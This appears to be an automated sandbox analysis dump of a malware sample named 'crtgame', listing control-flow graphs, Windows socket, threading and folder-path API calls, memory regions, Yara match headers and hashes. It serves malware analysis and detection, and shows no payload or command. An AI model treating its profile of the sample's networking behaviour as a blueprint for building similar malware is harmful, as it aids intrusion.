control_flow_graph 1362 2c42edd-2c42f1f WSASetLastError WSASocketA call 2c50510 WSAGetLastError 1365 2c42f21-2c42f25 1362->1365 1366 2c42f49-2c42f4f 1362->1366 1367 2c42f27-2c42f36 setsockopt 1365->1367 1368 2c42f3c-2c42f47 call 2c50510 1365->1368 1367->1368 1368->1366
                                                                                    APIs
                                                                                    • WSASetLastError.WS2_32(00000000,?,?,?,?,?,02C4358B,?,?,?,?,?,?,?,02C48FA9,?), ref: 02C42EEE
                                                                                    • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02C42EFD
                                                                                    • WSAGetLastError.WS2_32(?,02C4358B,?,?,?,?,?,?,?,02C48FA9,?,?,?,00000001,00000006,?), ref: 02C42F0C
                                                                                    • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02C42F36
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$Socketsetsockopt
                                                                                    • String ID:
                                                                                    • API String ID: 2093263913-0
                                                                                    • Opcode ID: ae55d94ee00073f09a1373dfdd4b2ab1338e3e4bb18a616d9104bbe15728ec69
                                                                                    • Instruction ID: 38a3e95ffa2afe1b27e561536e3446fb983041cc051982cea5c2a9946d036119
                                                                                    • Opcode Fuzzy Hash: ae55d94ee00073f09a1373dfdd4b2ab1338e3e4bb18a616d9104bbe15728ec69
                                                                                    • Instruction Fuzzy Hash: 76018871940214FBDB209F66DC88B5BBBA9EF89771F008A65FA18CB141D771C9008BA0

Control-flow Graph (interactive graph; legend: Executed / Not Executed)
control_flow_graph 1371 2c42db5-2c42dc8 1372 2c42de4-2c42de8 1371->1372 1373 2c42dca-2c42dd2 call 2c50510 1371->1373 1375 2c42dfc-2c42e07 call 2c42d39 1372->1375 1376 2c42dea-2c42ded 1372->1376 1380 2c42dd8 1373->1380 1382 2c42e0c-2c42e11 1375->1382 1376->1375 1378 2c42def-2c42dfa call 2c50510 1376->1378 1378->1380 1385 2c42ddb 1380->1385 1383 2c42e13 1382->1383 1384 2c42ddd-2c42de3 1382->1384 1387 2c42e16-2c42e18 1383->1387 1385->1384 1387->1385 1388 2c42e1a-2c42e35 call 2c50510 call 2c4166f 1387->1388 1393 2c42e54-2c42e97 WSASetLastError select call 2c49e92 1388->1393 1394 2c42e37-2c42e52 call 2c50510 call 2c4166f 1388->1394 1400 2c42ea6 1393->1400 1401 2c42e99-2c42ea4 call 2c50510 1393->1401 1394->1385 1394->1393 1403 2c42eb6-2c42eb8 1400->1403 1404 2c42ea8-2c42eb3 call 2c50510 1400->1404 1408 2c42ebe-2c42ed2 call 2c42d39 1401->1408 1403->1385 1403->1408 1404->1403 1408->1387 1412 2c42ed8 1408->1412 1412->1384
                                                                                    APIs
                                                                                      • Part of subcall function 02C42D39: WSASetLastError.WS2_32(00000000,?,?,00000001,?,?,02C43390,00000001,?,00000000,?,?,?,?,?), ref: 02C42D47
                                                                                      • Part of subcall function 02C42D39: WSASend.WS2_32(?,?,?,00000000,00000000,00000000,00000000), ref: 02C42D5C
                                                                                    • WSASetLastError.WS2_32(00000000,00000000,?,?), ref: 02C42E6D
                                                                                    • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02C42E83
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$Sendselect
                                                                                    • String ID: 3'
                                                                                    • API String ID: 2958345159-280543908
                                                                                    • Opcode ID: bf4274450cc0b702334fc10bac28594f01b888e5e8bd5adce5a19946f1484592
                                                                                    • Instruction ID: 947a21e32e01d431ad491772c60f41209d0c05fc7c241ca66f489e1067571d27
                                                                                    • Opcode Fuzzy Hash: bf4274450cc0b702334fc10bac28594f01b888e5e8bd5adce5a19946f1484592
                                                                                    • Instruction Fuzzy Hash: 3431ADB0A102199BDB10DFA0C8067EF7BAAAF48314F00495AEC44D7280EBB1D595DFA6

Control-flow Graph (interactive graph; legend: Executed / Not Executed)
control_flow_graph 1413 2c42ac7-2c42ad6 1414 2c42ae8-2c42b02 WSASetLastError connect call 2c49e92 1413->1414 1415 2c42ad8-2c42ae6 call 2c50510 1413->1415 1419 2c42b07-2c42b09 1414->1419 1420 2c42b13 1415->1420 1421 2c42b16-2c42b31 call 2c50510 call 2c4166f 1419->1421 1422 2c42b0b-2c42b10 call 2c50510 1419->1422 1420->1421 1429 2c42b50-2c42b5b call 2c43027 1421->1429 1430 2c42b33-2c42b4e call 2c50510 call 2c4166f 1421->1430 1422->1420 1436 2c42b5d-2c42b80 call 2c42fb4 1429->1436 1437 2c42b8f-2c42b94 1429->1437 1430->1429 1430->1437 1436->1437 1441 2c42b82-2c42b8c call 2c50510 1436->1441 1441->1437
                                                                                    APIs
                                                                                    • WSASetLastError.WS2_32(00000000,?,?), ref: 02C42AEA
                                                                                    • connect.WS2_32(00000010,?,?), ref: 02C42AF5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLastconnect
                                                                                    • String ID: 3'
                                                                                    • API String ID: 374722065-280543908
                                                                                    • Opcode ID: b4c35e10fae2b666a457a4ceb43cead26231b7049122eb05c7bfce4e155aa8f6
                                                                                    • Instruction ID: 71afb0bc1131c89c54f0ac460c29662999d0630e81977915a619845fbf804e37
                                                                                    • Opcode Fuzzy Hash: b4c35e10fae2b666a457a4ceb43cead26231b7049122eb05c7bfce4e155aa8f6
                                                                                    • Instruction Fuzzy Hash: 5621DB70E00218ABDF14EFB4C4046AFBBBAEF84324F504599EC5993380EFB49A459F95

Control-flow Graph (interactive graph; legend: Executed / Not Executed)
control_flow_graph 1444 2c4353e-2c43555 call 2c64df0 1447 2c43576-2c4359c call 2c42edd 1444->1447 1448 2c43557-2c43571 call 2c41996 1444->1448 1454 2c435ad-2c435c3 CreateIoCompletionPort 1447->1454 1455 2c4359e-2c435a8 1447->1455 1453 2c43688-2c43697 1448->1453 1457 2c435c5-2c435d9 GetLastError call 2c50510 1454->1457 1458 2c435db-2c435e2 call 2c50510 1454->1458 1456 2c43684 1455->1456 1461 2c43687 1456->1461 1464 2c435e4-2c435ed 1457->1464 1458->1464 1461->1453 1465 2c43626-2c43630 1464->1465 1466 2c435ef-2c43624 call 2c50510 call 2c429ee 1464->1466 1468 2c43640 1465->1468 1469 2c43632-2c43633 1465->1469 1466->1461 1470 2c43644-2c4366a call 2c4d87f 1468->1470 1472 2c43635-2c43638 1469->1472 1473 2c4363a-2c4363e 1469->1473 1478 2c43671-2c43681 call 2c50510 1470->1478 1479 2c4366c call 2c4143f 1470->1479 1472->1470 1473->1470 1478->1456 1479->1478
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 156438c251929bf497011ed2fd66a61d5d1236dae48ffc3d5b6e04db1fa75b35
                                                                                    • Instruction ID: 11574c61ec5c6e51aee568a47a3bd97fab124f38fe4b387da815f75331a95a1c
                                                                                    • Opcode Fuzzy Hash: 156438c251929bf497011ed2fd66a61d5d1236dae48ffc3d5b6e04db1fa75b35
                                                                                    • Instruction Fuzzy Hash: CA516EB190425ADFCB08DF68C4446AABBB1FF48320F20815EE8699B380DB70D910CFA4
                                                                                    APIs
                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 02C436A7
                                                                                      • Part of subcall function 02C42420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C42432
                                                                                      • Part of subcall function 02C42420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C42445
                                                                                      • Part of subcall function 02C42420: RtlEnterCriticalSection.NTDLL(?), ref: 02C42454
                                                                                      • Part of subcall function 02C42420: InterlockedExchange.KERNEL32(?,00000001), ref: 02C42469
                                                                                      • Part of subcall function 02C42420: RtlLeaveCriticalSection.NTDLL(?), ref: 02C42470
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                    • String ID:
                                                                                    • API String ID: 1601054111-0
                                                                                    • Opcode ID: 8597ac6434ae5b17e75513cc9667b37f369f7437ca7b2d0775c7c3335cd98279
                                                                                    • Instruction ID: ed6245fca6a97ef18800e058c8eb1df87448befc1c977d19d91597baf277d906
                                                                                    • Opcode Fuzzy Hash: 8597ac6434ae5b17e75513cc9667b37f369f7437ca7b2d0775c7c3335cd98279
                                                                                    • Instruction Fuzzy Hash: 1711C4B5100249ABDF218E14CC85FAB3B65FF80354F204556FE92C7290CF34D960CBA4
                                                                                    APIs
                                                                                    • __beginthreadex.LIBCMT ref: 02C51B06
                                                                                    • CloseHandle.KERNEL32(?,00000000,?,?,?,?,02C4A5DA,00000000), ref: 02C51B37
                                                                                    • ResumeThread.KERNELBASE(?,00000000,?,?,?,?,02C4A5DA,00000000), ref: 02C51B45
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandleResumeThread__beginthreadex
                                                                                    • String ID:
                                                                                    • API String ID: 1685284544-0
                                                                                    • Opcode ID: 2aec7cdbfdb574870f8b7a4124e9d28aecba69f8810008c997de3920c6f9831b
                                                                                    • Instruction ID: 0a88617d8dd362cd3d38a0568aa636dd3c75c951b5017bfa02250b84c9992dad
                                                                                    • Opcode Fuzzy Hash: 2aec7cdbfdb574870f8b7a4124e9d28aecba69f8810008c997de3920c6f9831b
                                                                                    • Instruction Fuzzy Hash: F6F0C8743402109BD7209E5DDC88F9173D8EF88324F18056AF948C7280D3B1E8D29A94
                                                                                    APIs
                                                                                    • InterlockedIncrement.KERNEL32(02C77524), ref: 02C41ABA
                                                                                    • WSAStartup.WS2_32(00000002,00000000), ref: 02C41ACB
                                                                                    • InterlockedExchange.KERNEL32(02C77528,00000000), ref: 02C41AD7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Interlocked$ExchangeIncrementStartup
                                                                                    • String ID:
                                                                                    • API String ID: 1856147945-0
                                                                                    • Opcode ID: 7d724d150b1f91f457565297566d129dfbc1347e29a1c04e45f781099439ec24
                                                                                    • Instruction ID: c8723423695bb941a5543ae5723ee2edf0749fa10d604528ea0965a843fb049e
                                                                                    • Opcode Fuzzy Hash: 7d724d150b1f91f457565297566d129dfbc1347e29a1c04e45f781099439ec24
                                                                                    • Instruction Fuzzy Hash: 14D05EB1D946086BF21067A6AC0EB79F7ACE704629F440B62FD6AC00C0EA506928C5F6
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C44B1D
                                                                                      • Part of subcall function 02C41BA7: __EH_prolog.LIBCMT ref: 02C41BAC
                                                                                      • Part of subcall function 02C41BA7: RtlEnterCriticalSection.NTDLL ref: 02C41BBC
                                                                                      • Part of subcall function 02C41BA7: RtlLeaveCriticalSection.NTDLL ref: 02C41BEA
                                                                                      • Part of subcall function 02C41BA7: RtlEnterCriticalSection.NTDLL ref: 02C41C13
                                                                                      • Part of subcall function 02C41BA7: RtlLeaveCriticalSection.NTDLL ref: 02C41C56
                                                                                      • Part of subcall function 02C4DA84: __EH_prolog.LIBCMT ref: 02C4DA89
                                                                                      • Part of subcall function 02C4DA84: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C4DB08
                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 02C44C1D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                    • String ID:
                                                                                    • API String ID: 1927618982-0
                                                                                    • Opcode ID: 702de43563feada03b2684b53d677ec0fa222916a529fbc454b0f851fa6da57f
                                                                                    • Instruction ID: 5a92b6025617a4aa0d397e1b52d955e89ad966a0e9ca33326b6ec885c389c68f
                                                                                    • Opcode Fuzzy Hash: 702de43563feada03b2684b53d677ec0fa222916a529fbc454b0f851fa6da57f
                                                                                    • Instruction Fuzzy Hash: 1B5129B1D04248DFDB15DFA8C884AEEFFB5AF48314F24815AE906AB351DB709A44DF60
                                                                                    APIs
                                                                                    • WSASetLastError.WS2_32(00000000,?,?,00000001,?,?,02C43390,00000001,?,00000000,?,?,?,?,?), ref: 02C42D47
                                                                                    • WSASend.WS2_32(?,?,?,00000000,00000000,00000000,00000000), ref: 02C42D5C
                                                                                      • Part of subcall function 02C49E92: WSAGetLastError.WS2_32(?,00000080,00000017,02C43114), ref: 02C49EA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$Send
                                                                                    • String ID:
                                                                                    • API String ID: 1282938840-0
                                                                                    • Opcode ID: 5b781bc03ccd2a27bb39b11ec77da65a0d2d56e9ead53aad7643929c078126bb
                                                                                    • Instruction ID: 3af11f5af0da5e782ae4d3a60f21b7924df523b50e5f3dcad2f75428ecb515af
                                                                                    • Opcode Fuzzy Hash: 5b781bc03ccd2a27bb39b11ec77da65a0d2d56e9ead53aad7643929c078126bb
                                                                                    • Instruction Fuzzy Hash: 450171B5500219EFD7205F95884486BBBEDFB88764B20096EFC9983200EF709D40DBA2
APIs
• WSASetLastError.WS2_32(00000000,00000000,?,02C4752F,?,02C774D8,02C774D8,?,?,02C774D8,00000000,000007E7), ref: 02C47D90
• shutdown.WS2_32(00000000,00000002), ref: 02C47D99
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
Yara matches
Similarity
• API ID: ErrorLastshutdown
• String ID:
• API String ID: 1920494066-0
APIs
• __EH_prolog.LIBCMT ref: 02C45049
  • Part of subcall function 02C43D7E: htons.WS2_32(?), ref: 02C43DA2
  • Part of subcall function 02C43D7E: htonl.WS2_32(00000000), ref: 02C43DB9
  • Part of subcall function 02C43D7E: htonl.WS2_32(00000000), ref: 02C43DC0
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
Yara matches
Similarity
• API ID: htonl$H_prologhtons
• String ID:
• API String ID: 4039807196-0
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C7A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C7A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c7a000_crtgame.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• SHGetSpecialFolderPathW.SHELL32(773DC1D4), ref: 02CA8846
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C7A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C7A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c7a000_crtgame.jbxd
Similarity
• API ID: FolderPathSpecial
• String ID:
• API String ID: 994120019-0
APIs
• SHGetSpecialFolderPathW.SHELL32(773DC1D4), ref: 02CA8846
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C7A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C7A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c7a000_crtgame.jbxd
Similarity
• API ID: FolderPathSpecial
• String ID:
• API String ID: 994120019-0
APIs
• __EH_prolog.LIBCMT ref: 02C4E352
  • Part of subcall function 02C41A01: TlsGetValue.KERNEL32 ref: 02C41A0A
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
Yara matches
Similarity
• API ID: H_prologValue
• String ID:
• API String ID: 3700342317-0
APIs
• InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02C433CC
  • Part of subcall function 02C432AB: __EH_prolog.LIBCMT ref: 02C432B0
  • Part of subcall function 02C432AB: RtlEnterCriticalSection.NTDLL(?), ref: 02C432C3
  • Part of subcall function 02C432AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02C432EF
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
Yara matches
Similarity
• API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
• String ID:
• API String ID: 1518410164-0
APIs
• __EH_prolog.LIBCMT ref: 02C4DEE2
  • Part of subcall function 02C426DB: RtlEnterCriticalSection.NTDLL(?), ref: 02C42706
  • Part of subcall function 02C426DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02C4272B
  • Part of subcall function 02C426DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02C65553), ref: 02C42738
  • Part of subcall function 02C426DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02C42778
  • Part of subcall function 02C426DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02C427D9
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
Yara matches
Similarity
• API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
• String ID:
• API String ID: 4293676635-0
APIs
• __EH_prolog.LIBCMT ref: 02C4DCC1
  • Part of subcall function 02C5354C: _malloc.LIBCMT ref: 02C53564
  • Part of subcall function 02C4DEDD: __EH_prolog.LIBCMT ref: 02C4DEE2
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
Yara matches
Similarity
• API ID: H_prolog$_malloc
• String ID:
• API String ID: 4254904621-0
APIs
  • Part of subcall function 02C5565A: __getptd_noexit.LIBCMT ref: 02C5565B
  • Part of subcall function 02C5565A: __amsg_exit.LIBCMT ref: 02C55668
  • Part of subcall function 02C52E93: __getptd_noexit.LIBCMT ref: 02C52E97
  • Part of subcall function 02C52E93: __freeptd.LIBCMT ref: 02C52EB1
  • Part of subcall function 02C52E93: RtlExitUserThread.NTDLL(?,00000000,?,02C52E73,00000000), ref: 02C52EBA
• __XcptFilter.LIBCMT ref: 02C52E7F
  • Part of subcall function 02C58794: __getptd_noexit.LIBCMT ref: 02C58798
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
Yara matches
Similarity
• API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
• String ID:
• API String ID: 1405322794-0
APIs
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C7A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C7A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c7a000_crtgame.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
  • Part of subcall function 02C51010: OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02C510B0
  • Part of subcall function 02C51010: CloseHandle.KERNEL32(00000000), ref: 02C510C5
  • Part of subcall function 02C51010: ResetEvent.KERNEL32(00000000), ref: 02C510CF
  • Part of subcall function 02C51010: CloseHandle.KERNEL32(00000000,F0F7CB0E), ref: 02C51104
• TlsSetValue.KERNEL32(00000025,?), ref: 02C51BAA
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
Yara matches
Similarity
• API ID: CloseEventHandle$OpenResetValue
• String ID:
• API String ID: 1556185888-0
APIs
  • Part of subcall function 02C49462: __EH_prolog.LIBCMT ref: 02C49467
  • Part of subcall function 02C49462: _Allocate.LIBCPMT ref: 02C494BE
• _memset.LIBCMT ref: 02C50339
• FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02C503A2
• GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02C503AA
Strings
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
Yara matches
Similarity
• API ID: AllocateErrorFormatH_prologLastMessage_memset
• String ID: Unknown error$invalid string position
• API String ID: 2731337147-1837348584
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,02C54896,?,?,?,00000001), ref: 02C58F2D
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02C58F36
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C424E6
                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02C424FC
                                                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 02C4250E
                                                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 02C4256D
                                                                                    • SetLastError.KERNEL32(00000000,?,7591DFB0), ref: 02C4257F
                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7591DFB0), ref: 02C42599
                                                                                    • GetLastError.KERNEL32(?,7591DFB0), ref: 02C425A2
                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C425F0
                                                                                    • InterlockedDecrement.KERNEL32(00000002), ref: 02C4262F
                                                                                    • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02C4268E
                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C42699
                                                                                    • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02C426AD
                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7591DFB0), ref: 02C426BD
                                                                                    • GetLastError.KERNEL32(?,7591DFB0), ref: 02C426C7
                                                                                    • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                                    • String ID:
                                                                                    • API String ID: 1213838671-0
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C44533
                                                                                      • Part of subcall function 02C5354C: _malloc.LIBCMT ref: 02C53564
                                                                                    • htons.WS2_32(?), ref: 02C44594
                                                                                    • htonl.WS2_32(?), ref: 02C445B7
                                                                                    • htonl.WS2_32(00000000), ref: 02C445BE
                                                                                    • htons.WS2_32(00000000), ref: 02C44672
                                                                                    • _sprintf.LIBCMT ref: 02C44688
                                                                                    • htons.WS2_32(?), ref: 02C445DB
                                                                                      • Part of subcall function 02C490C0: __EH_prolog.LIBCMT ref: 02C490C5
                                                                                      • Part of subcall function 02C490C0: RtlEnterCriticalSection.NTDLL(00000020), ref: 02C49140
                                                                                      • Part of subcall function 02C490C0: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02C4915E
                                                                                      • Part of subcall function 02C41BA7: __EH_prolog.LIBCMT ref: 02C41BAC
                                                                                      • Part of subcall function 02C41BA7: RtlEnterCriticalSection.NTDLL ref: 02C41BBC
                                                                                      • Part of subcall function 02C41BA7: RtlLeaveCriticalSection.NTDLL ref: 02C41BEA
                                                                                      • Part of subcall function 02C41BA7: RtlEnterCriticalSection.NTDLL ref: 02C41C13
                                                                                      • Part of subcall function 02C41BA7: RtlLeaveCriticalSection.NTDLL ref: 02C41C56
                                                                                      • Part of subcall function 02C4D87F: __EH_prolog.LIBCMT ref: 02C4D884
                                                                                    • htonl.WS2_32(?), ref: 02C448A7
                                                                                    • htonl.WS2_32(00000000), ref: 02C448AE
                                                                                    • htonl.WS2_32(00000000), ref: 02C448F3
                                                                                    • htonl.WS2_32(00000000), ref: 02C448FA
                                                                                    • htons.WS2_32(?), ref: 02C4491A
                                                                                    • htons.WS2_32(?), ref: 02C44924
                                                                                    • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_sprintf
                                                                                    • String ID:
                                                                                    • API String ID: 725951905-0
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C43428
                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02C4346B
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02C43472
                                                                                    • GetLastError.KERNEL32 ref: 02C43486
                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02C434D7
                                                                                    • RtlEnterCriticalSection.NTDLL(00000018), ref: 02C434ED
                                                                                    • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02C43518
                                                                                    Strings
                                                                                    • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                                    • String ID: CancelIoEx$KERNEL32
                                                                                    • API String ID: 2902213904-434325024
                                                                                    APIs
                                                                                    • OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02C510B0
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C510C5
                                                                                    • ResetEvent.KERNEL32(00000000), ref: 02C510CF
                                                                                    • CloseHandle.KERNEL32(00000000,F0F7CB0E), ref: 02C51104
                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,F0F7CB0E), ref: 02C5117A
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C5118F
                                                                                    • API ID: CloseEventHandle$CreateOpenReset
                                                                                    • String ID:
                                                                                    • API String ID: 1285874450-0
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 02C420AC
                                                                                    • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02C420CD
                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C420D8
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 02C4213E
                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02C4217A
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 02C42187
                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C421A6
                                                                                    • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                                    • String ID:
                                                                                    • API String ID: 1171374749-0
                                                                                    APIs
